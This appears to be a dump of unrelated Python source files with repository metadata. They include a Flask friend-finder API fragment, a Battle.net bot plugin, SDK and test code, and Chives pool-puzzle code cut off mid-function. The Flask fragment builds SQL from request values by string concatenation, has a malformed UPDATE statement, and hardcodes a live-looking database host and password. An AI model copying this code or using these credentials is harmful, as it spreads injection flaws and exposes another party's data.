sql="SELECT name,native_lang,sex,residence,age,(now() - last_login),id FROM user_ids WHERE sex = '" + gender + "' AND native_lang = '" + srch_native_lang + "'" + age_qry
cur.execute(sql)
friend_rslt = cur.fetchall()
conn.close()
friends = [{'name':item[0],'native_lang':item[1],'gender':item[2],'residnce':item[3],'age':str(item[4]),"last_login_time":str(item[5].days) + ' days','id':item[6]} for item in friend_rslt]
payload = {'friends':friends}
resp=json.dumps(payload)
return resp
@app.route("/apis/friends_relationship", methods=['GET','POST'])
def friends_relationship():
user_id_friend = request.json['user_id_friend']
status = request.json['status']
user_friends = friend_list(user_id_friend,status)
payload = user_friends
resp=json.dumps(payload)
return resp
@app.route("/apis/friend_request", methods=['GET','POST'])
def friends_request():
user_id_friend = request.json['user_id_friend']
req_type = request.json['req_type']
requested_id = request.json['requested_id']
conn = psycopg2.connect("dbname='langalearn' user='ymroddi' host='lango84.cukbl7fyxfht.us-west-1.rds.amazonaws.com' password='royallord8413'")
cur = conn.cursor()
if req_type == 'friend_request':
request_date = datetime.now()
status = 1
req_data = (user_id_friend,requested_id,status,request_date)
sql='INSERT INTO relationships (userid1,userid2,status,request_date) VALUES (%s, %s, %s,%s)'
message = "Request Made " + request_date.strftime('%m/%d/%Y')
cur.execute(sql,req_data )
conn.commit()
conn.close()
if req_type == 'friend_acceptance':
status = str(2)
accept_date = datetime.now()
accept_data = (status,accept_date)
sql='UPDATE relationships (status,accept_date) VALUES (%s, %s)'
message = "Request Accept " + accept_date.strftime('%m/%d/%Y')
cur.execute(sql,accept_data)
conn.commit()
conn.close()
payload = {'message':message}
resp=json.dumps(payload)
return resp
if __name__ == '__main__':
app.debug = True
application.run(host='0.0.0.0',port='8484')
| 36.756272
| 391
| 0.648805
|
75bbc0975c32e0e5597a12509bb1c6487fe66953
| 2,629
|
py
|
Python
|
plugins/cnotify.py
|
followy0urdream/ghost.py
|
223d507778f194463a1737afd81b316c8d4dcac8
|
[
"MIT"
] | 6
|
2017-03-21T19:45:22.000Z
|
2021-11-02T10:26:49.000Z
|
plugins/cnotify.py
|
followy0urdream/ghost.py
|
223d507778f194463a1737afd81b316c8d4dcac8
|
[
"MIT"
] | null | null | null |
plugins/cnotify.py
|
followy0urdream/ghost.py
|
223d507778f194463a1737afd81b316c8d4dcac8
|
[
"MIT"
] | 4
|
2017-12-18T15:12:17.000Z
|
2020-11-23T17:34:29.000Z
|
import eventlet
import hook, bnetprotocol
from misc import *
from config import config
clantrack = hook.import_plugin('clantrack')
parsed_settings = {}
def parse_settings():
for i in xrange(9001):
try:
settings = config[__name__.split('.')[-1] + str(i)]
except KeyError:
break
parsed_settings[i] = {}
ignore = int(settings.get('ignore', '0'))
parsed_settings[i]['ignore'] = ignore
if ignore:
continue
parsed_settings[i]['minrank'] = int(settings['minrank'])
parsed_settings[i]['command'] = settings['command']
parsed_settings[i]['clantrack_pool'] = settings['clantrack_pool']
spam_locks = {}
def message_received(bn, d):
if parsed_settings[bn.id]['ignore']:
return
if d.event == bnetprotocol.EID_TALK:
msg_list = str(d.message).split(' ', 1)
try:
command, payload = msg_list
except ValueError:
command = msg_list[0]
payload = ''
if command == parsed_settings[bn.id]['command'] and len(payload) > 0 \
and clantrack.get_clanmember_rank(bn, str(d.user)) >= int(parsed_settings[bn.id]['minrank']):
onlinenames = clantrack.get_online_clanmembers(bn)
pool = clantrack.bn_to_pool(bn)
if spam_locks.get(pool, False) == False:
spam_locks[pool] = True
bn_pool = clantrack.list_of_bnet_objects(pool)
bn_count = len(bn_pool)
bn_i = 0
current_bn = bn_pool[0]
current_bn.send_packet(bnetprotocol.SEND_SID_CHATCOMMAND('Adding %d to Clan Notify List' % len(onlinenames)))
for i in onlinenames:
current_bn, bn_i = next_in_circular_list(bn_pool, bn_i)
current_bn.send_packet(bnetprotocol.SEND_SID_CHATCOMMAND('/w %s %s' % (i, payload)))
atomic_debug('whispering to %s using %s' % (i, repr(current_bn)))
eventlet.sleep(3./bn_count)
current_bn, bn_i = next_in_circular_list(bn_pool, bn_i)
current_bn.send_packet(bnetprotocol.SEND_SID_CHATCOMMAND(', '.join(clantrack.clantags_in_pool(pool)) + ' Done sending messages.'))
spam_locks[pool] = False
else:
atomic_debug('pool %d is spamlocked' % pool)
def install():
parse_settings()
hook.register('after-handle_sid_chatevent', message_received)
def uninstall():
hook.unregister('after-handle_sid_chatevent', message_received)
| 38.101449
| 146
| 0.593762
|
5e3ecbb75a4e2cdde1f86dd70612efb9f977e6dd
| 4,651
|
py
|
Python
|
huaweicloud-sdk-oms/huaweicloudsdkoms/v2/model/smn_info.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 64
|
2020-06-12T07:05:07.000Z
|
2022-03-30T03:32:50.000Z
|
huaweicloud-sdk-oms/huaweicloudsdkoms/v2/model/smn_info.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 11
|
2020-07-06T07:56:54.000Z
|
2022-01-11T11:14:40.000Z
|
huaweicloud-sdk-oms/huaweicloudsdkoms/v2/model/smn_info.py
|
huaweicloud/huaweicloud-sdk-python-v3
|
7a6270390fcbf192b3882bf763e7016e6026ef78
|
[
"Apache-2.0"
] | 24
|
2020-06-08T11:42:13.000Z
|
2022-03-04T06:44:08.000Z
|
# coding: utf-8
import re
import six
from huaweicloudsdkcore.utils.http_utils import sanitize_for_serialization
class SmnInfo:
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
sensitive_list = []
openapi_types = {
'notify_result': 'bool',
'notify_error_message': 'str',
'topic_name': 'str'
}
attribute_map = {
'notify_result': 'notify_result',
'notify_error_message': 'notify_error_message',
'topic_name': 'topic_name'
}
def __init__(self, notify_result=None, notify_error_message=None, topic_name=None):
"""SmnInfo - a model defined in huaweicloud sdk"""
self._notify_result = None
self._notify_error_message = None
self._topic_name = None
self.discriminator = None
if notify_result is not None:
self.notify_result = notify_result
if notify_error_message is not None:
self.notify_error_message = notify_error_message
if topic_name is not None:
self.topic_name = topic_name
@property
def notify_result(self):
"""Gets the notify_result of this SmnInfo.
记录迁移任务执行完毕后SMN消息是否发送成功。
:return: The notify_result of this SmnInfo.
:rtype: bool
"""
return self._notify_result
@notify_result.setter
def notify_result(self, notify_result):
"""Sets the notify_result of this SmnInfo.
记录迁移任务执行完毕后SMN消息是否发送成功。
:param notify_result: The notify_result of this SmnInfo.
:type: bool
"""
self._notify_result = notify_result
@property
def notify_error_message(self):
"""Gets the notify_error_message of this SmnInfo.
记录SMN消息发送失败原因的错误码(迁移任务成功时为空)。
:return: The notify_error_message of this SmnInfo.
:rtype: str
"""
return self._notify_error_message
@notify_error_message.setter
def notify_error_message(self, notify_error_message):
"""Sets the notify_error_message of this SmnInfo.
记录SMN消息发送失败原因的错误码(迁移任务成功时为空)。
:param notify_error_message: The notify_error_message of this SmnInfo.
:type: str
"""
self._notify_error_message = notify_error_message
@property
def topic_name(self):
"""Gets the topic_name of this SmnInfo.
SMN Topic的名称(SMN消息发送成功时为空)。
:return: The topic_name of this SmnInfo.
:rtype: str
"""
return self._topic_name
@topic_name.setter
def topic_name(self, topic_name):
"""Sets the topic_name of this SmnInfo.
SMN Topic的名称(SMN消息发送成功时为空)。
:param topic_name: The topic_name of this SmnInfo.
:type: str
"""
self._topic_name = topic_name
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
if attr in self.sensitive_list:
result[attr] = "****"
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
import simplejson as json
if six.PY2:
import sys
reload(sys)
sys.setdefaultencoding("utf-8")
return json.dumps(sanitize_for_serialization(self), ensure_ascii=False)
def __repr__(self):
"""For `print`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, SmnInfo):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 27.52071
| 87
| 0.58439
|
60aee9c1913979c0fd914bb77b0939fb8b1aadb0
| 492
|
py
|
Python
|
General2.py
|
work-acc/praktika10
|
64fba67d0704a60ff8178e774cf1e3132cfd7476
|
[
"MIT"
] | null | null | null |
General2.py
|
work-acc/praktika10
|
64fba67d0704a60ff8178e774cf1e3132cfd7476
|
[
"MIT"
] | null | null | null |
General2.py
|
work-acc/praktika10
|
64fba67d0704a60ff8178e774cf1e3132cfd7476
|
[
"MIT"
] | null | null | null |
#!/usr/bin/evn python3
# -*- config: utf-8 -*-
import math
def cylinder(r, h, full=True):
def circle(r):
return math.pi * (r ** 2)
s_cylinder = 2 * math.pi * r * h
if full:
return s_cylinder + 2 * circle(r)
else:
print(s_cylinder)
if __name__ == '__main__':
s_circle = 0
a = float(input("Введите радиус: "))
b = float(input("Введите высоту: "))
c = input("side or full?")
s = cylinder(a, b, full=(c == 'full'))
print(s)
| 18.222222
| 42
| 0.54065
|
8b0877ce12d8747414a15746ff0f428a9f091b0d
| 2,387
|
py
|
Python
|
settings_example.py
|
alanmitchell/fnsb-benchmark
|
b7b8066d6adadfb13758fa5c77fa0e52175a6211
|
[
"MIT"
] | null | null | null |
settings_example.py
|
alanmitchell/fnsb-benchmark
|
b7b8066d6adadfb13758fa5c77fa0e52175a6211
|
[
"MIT"
] | 25
|
2017-10-19T17:28:43.000Z
|
2017-10-20T22:36:50.000Z
|
settings_example.py
|
alanmitchell/fnsb-benchmark
|
b7b8066d6adadfb13758fa5c77fa0e52175a6211
|
[
"MIT"
] | null | null | null |
"""This file is an example settings.py file, which controls aspects of
how the benchmark.py script will run.
Copy this file to a file named "settings.py" in this directory, and then
modify the settings in that file, not this example file.
The settings file is a standard Python module, so Python expressions or any
type of Python code is possible.
"""
# This is the path to the Utility Bill CSV file that will be read by the
# benchmark script. The path should be expressed relative to this directory
# (the directory where settings.py and benchmark.py reside).
#(string file path, use forward slashes for directory separators)
UTILITY_BILL_FILE_PATH = 'data/20171017_AllDataExport.CSV'
# This is the path to the Other Data directory that hold the Buildings.xlsx
# and Fuels.xlsx spreadsheets. Those spreadsheets
# give information about the buildings being benchmarked and general
# energy data. (string directory path, use forward slashes for directory separators)
OTHER_DATA_DIR_PATH = 'data/'
# Set the following to True if you want to use the same Utility Bill and Other
# Data from the last run of the benchmark script. This will substantially
# speed up the time required to run the script, since reading the CSV file and
# preprocessing the data are skipped. Useful for debugging code that doesn't
# affect the preprocessing routine. (True / False)
USE_DATA_FROM_LAST_RUN = False
# If the following setting is True, debug information will be written to the
# 'output/debug' directory, including the raw variable values that are passed
# to the HTML reporting template. (True / False)
WRITE_DEBUG_DATA = False
# If you are debugging or modifying the code in the benchmark script, it is
# convenient to only run some of the sites through the benchmark script to save
# time. Set the number of sites you want to run in the setting below. If you
# want to run all the sites, set the value to 0. The sites are processed in
# alphabetical order based on their Site ID. (integer)
MAX_NUMBER_SITES_TO_RUN = 0
# ------------------------------------------------------------------------------
# The settings below here only apply to use of this script with AHFC ARIS data.
# Base URL to the ARIS API
ARIS_API_URL = 'http://arisapi.test.ahfc.us/api/buildingenergy'
# Username and Password for the ARIS API
ARIS_USERNAME = 'the_user_name'
ARIS_PASSWORD = 'the_password'
| 46.803922
| 84
| 0.75199
|
91072824586cc030c54bf6b1626e29bb52aed9f6
| 2,451
|
py
|
Python
|
tests/integration/test_repeat.py
|
mferreravila/cunumeric
|
87901174d0ecb1719bbccb98201dc19034973834
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_repeat.py
|
mferreravila/cunumeric
|
87901174d0ecb1719bbccb98201dc19034973834
|
[
"Apache-2.0"
] | null | null | null |
tests/integration/test_repeat.py
|
mferreravila/cunumeric
|
87901174d0ecb1719bbccb98201dc19034973834
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2021-2022 NVIDIA Corporation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import numpy as np
import pytest
from test_tools.generators import mk_seq_array
import cunumeric as num
from legate.core import LEGATE_MAX_DIM
np.random.seed(12345)
def test_basic():
assert np.array_equal(num.repeat(3, 4), np.repeat(3, 4))
assert np.array_equal(num.repeat([3, 1], 4), np.repeat([3, 1], 4))
def test_axis():
anp = np.array([1, 2, 3, 4, 5])
a = num.array(anp)
repnp = np.array([1, 2, 1, 2, 1])
rep = num.array(repnp)
print(num.repeat(a, rep, axis=0))
print(np.repeat(anp, repnp, axis=0))
assert np.array_equal(
num.repeat(a, rep, axis=0), np.repeat(anp, repnp, axis=0)
)
xnp = np.array([[1, 2], [3, 4]])
x = num.array([[1, 2], [3, 4]])
assert np.array_equal(
num.repeat(x, [1, 2], axis=0), np.repeat(xnp, [1, 2], axis=0)
)
assert np.array_equal(num.repeat(x, 0, axis=0), np.repeat(xnp, 0, axis=0))
@pytest.mark.parametrize("ndim", range(1, LEGATE_MAX_DIM + 1))
def test_nd(ndim):
a_shape = tuple(np.random.randint(1, 9) for _ in range(ndim))
np_array = mk_seq_array(np, a_shape)
num_array = mk_seq_array(num, a_shape)
repeats = np.random.randint(0, 15)
res_num = num.repeat(num_array, repeats)
res_np = np.repeat(np_array, repeats)
assert np.array_equal(res_num, res_np)
for axis in range(0, ndim):
res_num2 = num.repeat(num_array, repeats, axis)
res_np2 = np.repeat(np_array, repeats, axis)
assert np.array_equal(res_num2, res_np2)
rep_shape = (a_shape[axis],)
rep_arr_np = mk_seq_array(np, rep_shape)
rep_arr_num = mk_seq_array(num, rep_shape)
res_num3 = num.repeat(num_array, rep_arr_num, axis)
res_np3 = np.repeat(np_array, rep_arr_np, axis)
assert np.array_equal(res_num3, res_np3)
if __name__ == "__main__":
import sys
pytest.main(sys.argv)
| 33.121622
| 78
| 0.671971
|
0546ca539902d174e3e900a13203a738f8f49301
| 16,940
|
py
|
Python
|
chives/pools/pool_puzzles.py
|
zcomputerwiz/chives-blockchain
|
73d268bf76f50ff6133c868b58891e75739a2708
|
[
"Apache-2.0"
] | 75
|
2021-06-27T03:30:59.000Z
|
2022-03-20T12:32:55.000Z
|
chives/pools/pool_puzzles.py
|
zcomputerwiz/chives-blockchain
|
73d268bf76f50ff6133c868b58891e75739a2708
|
[
"Apache-2.0"
] | 39
|
2021-07-02T07:11:24.000Z
|
2022-03-20T15:00:07.000Z
|
chives/pools/pool_puzzles.py
|
zcomputerwiz/chives-blockchain
|
73d268bf76f50ff6133c868b58891e75739a2708
|
[
"Apache-2.0"
] | 41
|
2021-06-24T11:24:43.000Z
|
2022-03-14T16:11:38.000Z
|
import logging
from typing import Tuple, List, Optional
from blspy import G1Element
from clvm.casts import int_from_bytes, int_to_bytes
from chives.clvm.singleton import SINGLETON_LAUNCHER
from chives.consensus.block_rewards import calculate_pool_reward
from chives.consensus.coinbase import pool_parent_id
from chives.pools.pool_wallet_info import PoolState, LEAVING_POOL, SELF_POOLING
from chives.types.blockchain_format.coin import Coin
from chives.types.blockchain_format.program import Program, SerializedProgram
from chives.types.blockchain_format.sized_bytes import bytes32
from chives.types.coin_spend import CoinSpend
from chives.wallet.puzzles.load_clvm import load_clvm
from chives.wallet.puzzles.singleton_top_layer import puzzle_for_singleton
from chives.util.ints import uint32, uint64
log = logging.getLogger(__name__)
# "Full" is the outer singleton, with the inner puzzle filled in
SINGLETON_MOD = load_clvm("singleton_top_layer.clvm")
POOL_WAITING_ROOM_MOD = load_clvm("pool_waitingroom_innerpuz.clvm")
POOL_MEMBER_MOD = load_clvm("pool_member_innerpuz.clvm")
P2_SINGLETON_MOD = load_clvm("p2_singleton_or_delayed_puzhash.clvm")
POOL_OUTER_MOD = SINGLETON_MOD
POOL_MEMBER_HASH = POOL_MEMBER_MOD.get_tree_hash()
POOL_WAITING_ROOM_HASH = POOL_WAITING_ROOM_MOD.get_tree_hash()
P2_SINGLETON_HASH = P2_SINGLETON_MOD.get_tree_hash()
POOL_OUTER_MOD_HASH = POOL_OUTER_MOD.get_tree_hash()
SINGLETON_LAUNCHER_HASH = SINGLETON_LAUNCHER.get_tree_hash()
SINGLETON_MOD_HASH = POOL_OUTER_MOD_HASH
SINGLETON_MOD_HASH_HASH = Program.to(SINGLETON_MOD_HASH).get_tree_hash()
def create_waiting_room_inner_puzzle(
target_puzzle_hash: bytes32,
relative_lock_height: uint32,
owner_pubkey: G1Element,
launcher_id: bytes32,
genesis_challenge: bytes32,
delay_time: uint64,
delay_ph: bytes32,
) -> Program:
pool_reward_prefix = bytes32(genesis_challenge[:16] + b"\x00" * 16)
p2_singleton_puzzle_hash: bytes32 = launcher_id_to_p2_puzzle_hash(launcher_id, delay_time, delay_ph)
return POOL_WAITING_ROOM_MOD.curry(
target_puzzle_hash, p2_singleton_puzzle_hash, bytes(owner_pubkey), pool_reward_prefix, relative_lock_height
)
def create_pooling_inner_puzzle(
target_puzzle_hash: bytes,
pool_waiting_room_inner_hash: bytes32,
owner_pubkey: G1Element,
launcher_id: bytes32,
genesis_challenge: bytes32,
delay_time: uint64,
delay_ph: bytes32,
) -> Program:
pool_reward_prefix = bytes32(genesis_challenge[:16] + b"\x00" * 16)
p2_singleton_puzzle_hash: bytes32 = launcher_id_to_p2_puzzle_hash(launcher_id, delay_time, delay_ph)
return POOL_MEMBER_MOD.curry(
target_puzzle_hash,
p2_singleton_puzzle_hash,
bytes(owner_pubkey),
pool_reward_prefix,
pool_waiting_room_inner_hash,
)
def create_full_puzzle(inner_puzzle: Program, launcher_id: bytes32) -> Program:
return puzzle_for_singleton(launcher_id, inner_puzzle)
def create_p2_singleton_puzzle(
singleton_mod_hash: bytes,
launcher_id: bytes32,
seconds_delay: uint64,
delayed_puzzle_hash: bytes32,
) -> Program:
# curry params are SINGLETON_MOD_HASH LAUNCHER_ID LAUNCHER_PUZZLE_HASH SECONDS_DELAY DELAYED_PUZZLE_HASH
return P2_SINGLETON_MOD.curry(
singleton_mod_hash, launcher_id, SINGLETON_LAUNCHER_HASH, seconds_delay, delayed_puzzle_hash
)
def launcher_id_to_p2_puzzle_hash(launcher_id: bytes32, seconds_delay: uint64, delayed_puzzle_hash: bytes32) -> bytes32:
return create_p2_singleton_puzzle(
SINGLETON_MOD_HASH, launcher_id, int_to_bytes(seconds_delay), delayed_puzzle_hash
).get_tree_hash()
def get_delayed_puz_info_from_launcher_spend(coinsol: CoinSpend) -> Tuple[uint64, bytes32]:
extra_data = Program.from_bytes(bytes(coinsol.solution)).rest().rest().first()
# Extra data is (pool_state delayed_puz_info)
# Delayed puz info is (seconds delayed_puzzle_hash)
seconds: Optional[uint64] = None
delayed_puzzle_hash: Optional[bytes32] = None
for key, value in extra_data.as_python():
if key == b"t":
seconds = int_from_bytes(value)
if key == b"h":
delayed_puzzle_hash = bytes32(value)
assert seconds is not None
assert delayed_puzzle_hash is not None
return seconds, delayed_puzzle_hash
######################################
def get_template_singleton_inner_puzzle(inner_puzzle: Program):
r = inner_puzzle.uncurry()
if r is None:
return False
uncurried_inner_puzzle, args = r
return uncurried_inner_puzzle
def get_seconds_and_delayed_puzhash_from_p2_singleton_puzzle(puzzle: Program) -> Tuple[uint64, bytes32]:
r = puzzle.uncurry()
if r is None:
return False
inner_f, args = r
singleton_mod_hash, launcher_id, launcher_puzzle_hash, seconds_delay, delayed_puzzle_hash = list(args.as_iter())
seconds_delay = uint64(seconds_delay.as_int())
return seconds_delay, delayed_puzzle_hash.as_atom()
# Verify that a puzzle is a Pool Wallet Singleton
def is_pool_singleton_inner_puzzle(inner_puzzle: Program) -> bool:
inner_f = get_template_singleton_inner_puzzle(inner_puzzle)
return inner_f in [POOL_WAITING_ROOM_MOD, POOL_MEMBER_MOD]
def is_pool_waitingroom_inner_puzzle(inner_puzzle: Program) -> bool:
inner_f = get_template_singleton_inner_puzzle(inner_puzzle)
return inner_f in [POOL_WAITING_ROOM_MOD]
def is_pool_member_inner_puzzle(inner_puzzle: Program) -> bool:
inner_f = get_template_singleton_inner_puzzle(inner_puzzle)
return inner_f in [POOL_MEMBER_MOD]
# This spend will use the escape-type spend path for whichever state you are currently in
# If you are currently a waiting inner puzzle, then it will look at your target_state to determine the next
# inner puzzle hash to go to. The member inner puzzle is already committed to its next puzzle hash.
def create_travel_spend(
last_coin_spend: CoinSpend,
launcher_coin: Coin,
current: PoolState,
target: PoolState,
genesis_challenge: bytes32,
delay_time: uint64,
delay_ph: bytes32,
) -> Tuple[CoinSpend, Program]:
inner_puzzle: Program = pool_state_to_inner_puzzle(
current,
launcher_coin.name(),
genesis_challenge,
delay_time,
delay_ph,
)
if is_pool_member_inner_puzzle(inner_puzzle):
# inner sol is key_value_list ()
# key_value_list is:
# "ps" -> poolstate as bytes
inner_sol: Program = Program.to([[("p", bytes(target))], 0])
elif is_pool_waitingroom_inner_puzzle(inner_puzzle):
# inner sol is (spend_type, key_value_list, pool_reward_height)
destination_inner: Program = pool_state_to_inner_puzzle(
target, launcher_coin.name(), genesis_challenge, delay_time, delay_ph
)
log.debug(
f"create_travel_spend: waitingroom: target PoolState bytes:\n{bytes(target).hex()}\n"
f"{target}"
f"hash:{Program.to(bytes(target)).get_tree_hash()}"
)
# key_value_list is:
# "ps" -> poolstate as bytes
inner_sol = Program.to([1, [("p", bytes(target))], destination_inner.get_tree_hash()]) # current or target
else:
raise ValueError
current_singleton: Optional[Coin] = get_most_recent_singleton_coin_from_coin_spend(last_coin_spend)
assert current_singleton is not None
if current_singleton.parent_coin_info == launcher_coin.name():
parent_info_list = Program.to([launcher_coin.parent_coin_info, launcher_coin.amount])
else:
p = Program.from_bytes(bytes(last_coin_spend.puzzle_reveal))
last_coin_spend_inner_puzzle: Optional[Program] = get_inner_puzzle_from_puzzle(p)
assert last_coin_spend_inner_puzzle is not None
parent_info_list = Program.to(
[
last_coin_spend.coin.parent_coin_info,
last_coin_spend_inner_puzzle.get_tree_hash(),
last_coin_spend.coin.amount,
]
)
full_solution: Program = Program.to([parent_info_list, current_singleton.amount, inner_sol])
full_puzzle: Program = create_full_puzzle(inner_puzzle, launcher_coin.name())
return (
CoinSpend(
current_singleton,
SerializedProgram.from_program(full_puzzle),
SerializedProgram.from_program(full_solution),
),
inner_puzzle,
)
def create_absorb_spend(
last_coin_spend: CoinSpend,
current_state: PoolState,
launcher_coin: Coin,
height: uint32,
genesis_challenge: bytes32,
delay_time: uint64,
delay_ph: bytes32,
) -> List[CoinSpend]:
inner_puzzle: Program = pool_state_to_inner_puzzle(
current_state, launcher_coin.name(), genesis_challenge, delay_time, delay_ph
)
reward_amount: uint64 = calculate_pool_reward(height)
if is_pool_member_inner_puzzle(inner_puzzle):
# inner sol is (spend_type, pool_reward_amount, pool_reward_height, extra_data)
inner_sol: Program = Program.to([reward_amount, height])
elif is_pool_waitingroom_inner_puzzle(inner_puzzle):
# inner sol is (spend_type, destination_puzhash, pool_reward_amount, pool_reward_height, extra_data)
inner_sol = Program.to([0, reward_amount, height])
else:
raise ValueError
# full sol = (parent_info, my_amount, inner_solution)
coin: Optional[Coin] = get_most_recent_singleton_coin_from_coin_spend(last_coin_spend)
assert coin is not None
if coin.parent_coin_info == launcher_coin.name():
parent_info: Program = Program.to([launcher_coin.parent_coin_info, launcher_coin.amount])
else:
p = Program.from_bytes(bytes(last_coin_spend.puzzle_reveal))
last_coin_spend_inner_puzzle: Optional[Program] = get_inner_puzzle_from_puzzle(p)
assert last_coin_spend_inner_puzzle is not None
parent_info = Program.to(
[
last_coin_spend.coin.parent_coin_info,
last_coin_spend_inner_puzzle.get_tree_hash(),
last_coin_spend.coin.amount,
]
)
full_solution: SerializedProgram = SerializedProgram.from_program(
Program.to([parent_info, last_coin_spend.coin.amount, inner_sol])
)
full_puzzle: SerializedProgram = SerializedProgram.from_program(
create_full_puzzle(inner_puzzle, launcher_coin.name())
)
assert coin.puzzle_hash == full_puzzle.get_tree_hash()
reward_parent: bytes32 = pool_parent_id(height, genesis_challenge)
p2_singleton_puzzle: SerializedProgram = SerializedProgram.from_program(
create_p2_singleton_puzzle(SINGLETON_MOD_HASH, launcher_coin.name(), delay_time, delay_ph)
)
reward_coin: Coin = Coin(reward_parent, p2_singleton_puzzle.get_tree_hash(), reward_amount)
p2_singleton_solution: SerializedProgram = SerializedProgram.from_program(
Program.to([inner_puzzle.get_tree_hash(), reward_coin.name()])
)
assert p2_singleton_puzzle.get_tree_hash() == reward_coin.puzzle_hash
assert full_puzzle.get_tree_hash() == coin.puzzle_hash
assert get_inner_puzzle_from_puzzle(Program.from_bytes(bytes(full_puzzle))) is not None
coin_spends = [
CoinSpend(coin, full_puzzle, full_solution),
CoinSpend(reward_coin, p2_singleton_puzzle, p2_singleton_solution),
]
return coin_spends
def get_most_recent_singleton_coin_from_coin_spend(coin_sol: CoinSpend) -> Optional[Coin]:
additions: List[Coin] = coin_sol.additions()
for coin in additions:
if coin.amount % 2 == 1:
return coin
return None
def get_pubkey_from_member_inner_puzzle(inner_puzzle: Program) -> G1Element:
args = uncurry_pool_member_inner_puzzle(inner_puzzle)
if args is not None:
(
_inner_f,
_target_puzzle_hash,
_p2_singleton_hash,
pubkey_program,
_pool_reward_prefix,
_escape_puzzlehash,
) = args
else:
raise ValueError("Unable to extract pubkey")
pubkey = G1Element.from_bytes(pubkey_program.as_atom())
return pubkey
def uncurry_pool_member_inner_puzzle(inner_puzzle: Program): # -> Optional[Tuple[Program, Program, Program]]:
"""
Take a puzzle and return `None` if it's not a "pool member" inner puzzle, or
a triple of `mod_hash, relative_lock_height, pubkey` if it is.
"""
if not is_pool_member_inner_puzzle(inner_puzzle):
raise ValueError("Attempting to unpack a non-waitingroom inner puzzle")
r = inner_puzzle.uncurry()
if r is None:
raise ValueError("Failed to unpack inner puzzle")
inner_f, args = r
# p2_singleton_hash is the tree hash of the unique, curried P2_SINGLETON_MOD. See `create_p2_singleton_puzzle`
# escape_puzzlehash is of the unique, curried POOL_WAITING_ROOM_MOD. See `create_waiting_room_inner_puzzle`
target_puzzle_hash, p2_singleton_hash, owner_pubkey, pool_reward_prefix, escape_puzzlehash = tuple(args.as_iter())
return inner_f, target_puzzle_hash, p2_singleton_hash, owner_pubkey, pool_reward_prefix, escape_puzzlehash
def uncurry_pool_waitingroom_inner_puzzle(inner_puzzle: Program) -> Tuple[Program, Program, Program, Program]:
"""
Take a puzzle and return `None` if it's not a "pool member" inner puzzle, or
a triple of `mod_hash, relative_lock_height, pubkey` if it is.
"""
if not is_pool_waitingroom_inner_puzzle(inner_puzzle):
raise ValueError("Attempting to unpack a non-waitingroom inner puzzle")
r = inner_puzzle.uncurry()
if r is None:
raise ValueError("Failed to unpack inner puzzle")
inner_f, args = r
v = args.as_iter()
target_puzzle_hash, p2_singleton_hash, owner_pubkey, genesis_challenge, relative_lock_height = tuple(v)
return target_puzzle_hash, relative_lock_height, owner_pubkey, p2_singleton_hash
def get_inner_puzzle_from_puzzle(full_puzzle: Program) -> Optional[Program]:
p = Program.from_bytes(bytes(full_puzzle))
r = p.uncurry()
if r is None:
return None
_, args = r
_, inner_puzzle = list(args.as_iter())
if not is_pool_singleton_inner_puzzle(inner_puzzle):
return None
return inner_puzzle
def pool_state_from_extra_data(extra_data: Program) -> Optional[PoolState]:
state_bytes: Optional[bytes] = None
try:
for key, value in extra_data.as_python():
if key == b"p":
state_bytes = value
break
if state_bytes is None:
return None
return PoolState.from_bytes(state_bytes)
except TypeError as e:
log.error(f"Unexpected return from PoolWallet Smart Contract code {e}")
return None
def solution_to_pool_state(full_spend: CoinSpend) -> Optional[PoolState]:
full_solution_ser: SerializedProgram = full_spend.solution
full_solution: Program = Program.from_bytes(bytes(full_solution_ser))
if full_spend.coin.puzzle_hash == SINGLETON_LAUNCHER_HASH:
# Launcher spend
extra_data: Program = full_solution.rest().rest().first()
return pool_state_from_extra_data(extra_data)
# Not launcher spend
inner_solution: Program = full_solution.rest().rest().first()
# Spend which is not absorb, and is not the launcher
num_args = len(inner_solution.as_python())
assert num_args in (2, 3)
if num_args == 2:
# pool member
if inner_solution.rest().first().as_int() != 0:
return None
# This is referred to as p1 in the chiveslisp code
# spend_type is absorbing money if p1 is a cons box, spend_type is escape if p1 is an atom
# TODO: The comment above, and in the CLVM, seems wrong
extra_data = inner_solution.first()
if isinstance(extra_data.as_python(), bytes):
# Absorbing
return None
return pool_state_from_extra_data(extra_data)
else:
# pool waitingroom
if inner_solution.first().as_int() == 0:
return None
extra_data = inner_solution.rest().first()
return pool_state_from_extra_data(extra_data)
def pool_state_to_inner_puzzle(
pool_state: PoolState, launcher_id: bytes32, genesis_challenge: bytes32, delay_time: uint64, delay_ph: bytes32
) -> Program:
escaping_inner_puzzle: Program = create_waiting_room_inner_puzzle(
pool_state.target_puzzle_hash,
pool_state.relative_lock_height,
pool_state.owner_pubkey,
launcher_id,
genesis_challenge,
delay_time,
delay_ph,
)
if pool_state.state in [LEAVING_POOL, SELF_POOLING]:
return escaping_inner_puzzle
else:
return create_pooling_inner_puzzle(
pool_state.target_puzzle_hash,
escaping_inner_puzzle.get_tree_hash(),
pool_state.owner_pubkey,
